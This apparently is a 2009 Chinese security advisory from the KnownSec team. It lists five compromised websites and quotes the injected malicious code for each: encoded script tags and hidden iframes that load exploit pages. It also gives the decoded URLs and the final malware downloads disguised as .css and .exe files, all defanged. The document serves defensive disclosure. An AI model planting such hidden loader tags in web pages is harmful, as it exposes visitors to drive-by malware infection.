注册
登录
| 关键词: hxxp cn www htm 无效 恶意 代码 css net 攻击 |
最后更新时间:Sat, 4 Jan 2009 0:01:01 (GMT+8) ________________________________________ 知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:诺科电子网上购物、MM公寓、西南财经大学、????、北京商网。 诺科电子网上购物(www.nkdz.net)多处被植入恶意代码: <script src=hxxp://%76%76%6b%32%2d%63%6e></script> <script language=”javascript” src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog” mce_src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog”></script> <script src=hxxp://%68%68%6a%32%2d%63%6e></script> 恶意链接地址解密后为: hxxp://vvk2-cn(无效) hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog hxxp://hhj2-cn(无效) 通过漏洞攻击,最终下载病毒: hxxp://www.67uy66.cn/1.css hxxp://www.oiuytr.net/new/a266.css MM公寓(www.mm-home.cn)底部被植入恶意代码: <script src=hxxp://%75%69%6E%35%2E%63%6E></script> <script src=hxxp://%63%63%68%31%2E%63%6E></script> <iframe src=hxxp://www.zgynkmk.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.rxgsslla.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.rxgssllt.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.zgcgsslle.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.falalioo.cn/b3.htm width=50 height=0 border=0></iframe> 恶意链接地址解密后为: hxxp://uin5.cn hxxp://cch1.cn hxxp://www.zgynkmk.cn/b3.htm hxxp://www.rxgsslla.cn/b3.htm hxxp://www.rxgssllt.cn/b3.htm hxxp://www.zgcgsslle.cn/b3.htm hxxp://www.falalioo.cn/b3.htm 通过漏洞攻击,最终下载病毒: hxxp://d.ko546.com/down/360Safe.exe hxxp://d.ko546.com/new/a1.css 西南财经大学(kyc.swufe.edu.cn)被植入恶意代码: <script src=hxxp://www.8wu.com/1.js></script> 通过漏洞攻击,最终下载病毒: hxxp://qq.18i16.net/sina.css hxxp://qq.18i16.net/baidu.cab hxxp://qq.18i16.net/exe1/ce.css hxxp://qq.18i16.net/exe1/ms.css hxxp://qq.18i16.net/exe1/a15.css hxxp://qq.18i16.net/exe1/bf.css hxxp://qq.18i16.net/exe1/re.css hxxp://121.12.173.218/exe1/cx.css ????(www.sunlux.net)底部被植入恶意代码: <script src=hxxp://%61%76%65%32%2E%63%6E></script> <script src=hxxp://%61%76%65%33%2E%63%6E></script> <iframe src=hxxp://www.wrmfwk.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.wrmfwj.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.wrmfwi.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.wrmfwu.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.wrmfww.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.hryspap.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.cznylsf.cn/b3.htm width=50 height=0 border=0></iframe> <iframe frameborder=0 src=”hxxp://caixia88.hrdns.net/index.htm” mce_src=”hxxp://caixia88.hrdns.net/index.htm” width=0 height=0 scrolling=no></iframe> <script src=hxxp://%75%69%6E%34%2E%63%6E></script> <script src=hxxp://%63%63%68%31%2E%63%6E></script> <script src=hxxp://%76%76%6B%31%2E%63%6E></script> <iframe src=hxxp://www.falaliqq.cn/b3.htm width=50 height=0 border=0></iframe> 恶意链接地址解密后为: hxxp://ave2.cn hxxp://ave3.cn hxxp://www.wrmfwk.cn/b3.htm(无效) hxxp://www.wrmfwj.cn/b3.htm hxxp://www.wrmfwi.cn/b3.htm hxxp://uin1.cn hxxp://www.wrmfwu.cn/b3.htm hxxp://uin2.cn hxxp://www.hryspap.cn/b3.htm hxxp://www.cznylsf.cn/b3.htm hxxp://caixia88.hrdns.net/index.htm(无效) hxxp://uin4.cn hxxp://uin5.cn hxxp://cch1.cn hxxp://cch2.cn hxxp://vvk1.cn(无效) hxxp://hhj1.cn(无效) hxxp://vvk2.cn hxxp://www.falaliqq.cn/b3.htm 通过漏洞攻击,最终下载病毒: hxxp://d.ko546.com/down/360Safe.exe hxxp://d.ko546.com/new/a1.css 北京商网(www.bjbusiness.com.cn/missvideo/index.html)底部被植入恶意代码: <script src=hxxp://%61%76%65%31%2E%63%6E></script> <iframe src=hxxp://www.pdh001.cn/b3.htm width=50 height=0 border=0></iframe> <script src=hxxp://%61%76%65%32%2E%63%6E></script> <iframe src=hxxp://www.wyf005.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.wyf010.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.hrz005.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.union501.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.eqw009.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.wrmfwd.cn/b3.htm width=50 height=0 border=0></iframe> <iframe src=hxxp://www.wrmfwk.cn/b3.htm width=50 height=0 border=0></iframe> <script src=hxxp://%61%76%65%33%2E%63%6E></script> <iframe src=hxxp://www.wrmfwi.cn/b3.htm width=50 height=0 border=0></iframe> <script src=hxxp://%75%69%6E%31%2E%63%6E></script> <script src=hxxp://%75%69%6E%32%2E%63%6E></script> <script src=hxxp://%75%69%6E%33%2E%63%6E></script> <script src=hxxp://%75%69%6E%35%2E%63%6E></script> <script src=hxxp://%76%76%6B%31%2E%63%6E></script> <script src=hxxp://%76%76%6B%32%2E%63%6E></script> 恶意链接地址解密后为: hxxp://ave1.cn hxxp://www.pdh001.cn/b3.htm(无效) hxxp://ave2.cn hxxp://www.wyf005.cn/b3.htm hxxp://www.wyf010.cn/b3.htm hxxp://www.hrz005.cn/b3.htm hxxp://www.union501.cn/b3.htm hxxp://www.eqw009.cn/b3.htm hxxp://www.wrmfwd.cn/b3.htm hxxp://www.wrmfwk.cn/b3.htm(无效) hxxp://ave3.cn hxxp://uin1.cn hxxp://www.wrmfwi.cn/b3.htm hxxp://uin2.cn hxxp://uin3.cn hxxp://uin4.cn hxxp://uin5.cn hxxp://cch1.cn hxxp://vvk1.cn(无效) hxxp://hhj1.cn(无效) hxxp://vvk2.cn 通过漏洞攻击,最终下载病毒: hxxp://d.ko546.com/down/360Safe.exe hxxp://d.ko546.com/new/a1.css 推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
